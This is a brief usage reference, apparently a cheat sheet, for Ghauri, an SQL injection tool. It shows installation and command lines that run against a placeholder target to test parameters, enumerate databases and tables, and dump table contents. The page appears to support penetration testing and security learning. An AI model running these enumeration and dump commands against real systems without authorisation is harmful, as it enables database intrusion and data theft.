Description
Ghauri is an advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws. It has improved detection capabilities compared to some older tools and supports various injection techniques.
Installation
BASH
pip install ghauriBasic Usage
BASH
# Basic test
ghauri -u "https://target.com/?id=1"
# POST request
ghauri -u "https://target.com" --data "param=value"Advanced Usage
BASH
# Enumerate databases
ghauri -u "https://target.com/?id=1" --dbs
# Enumerate tables
ghauri -u "https://target.com/?id=1" -D database --tables
# Dump data
ghauri -u "https://target.com/?id=1" -D database -T table --dump
# Set technique
ghauri -u "https://target.com/?id=1" --technique BEU
# With proxy
ghauri -u "https://target.com/?id=1" --proxy http://127.0.0.1:8080
# Batch mode
ghauri -u "https://target.com/?id=1" --batch